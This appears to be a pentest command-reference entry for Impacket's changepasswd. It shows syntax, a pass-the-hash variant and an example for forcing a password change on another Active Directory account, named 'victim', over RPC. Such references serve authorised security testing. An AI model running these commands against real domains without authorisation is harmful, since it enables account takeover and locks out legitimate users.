Impacket changepasswd

Change an AD user's password via RPC (requires appropriate ACL rights)

Tool
impacket-changepasswd
Category
Credential Attacks / Password Manipulation
Platform
linux
Requires
password
Protocols
RPC, SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-changepasswd '<domain>/<user>:<password>'@'<ip>' -newpass '<new_password>' -altuser '<target_user>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-changepasswd -hashes ':<hash>' '<domain>/<user>'@'<ip>' -newpass '<new_password>' -altuser '<target_user>'

Examples

impacket-changepasswd 'CORP.LOCAL/user:password'@192.168.1.100 -newpass 'NewPass123!' -altuser 'victim'

Tags

impacket password-change acl force-change-password rpc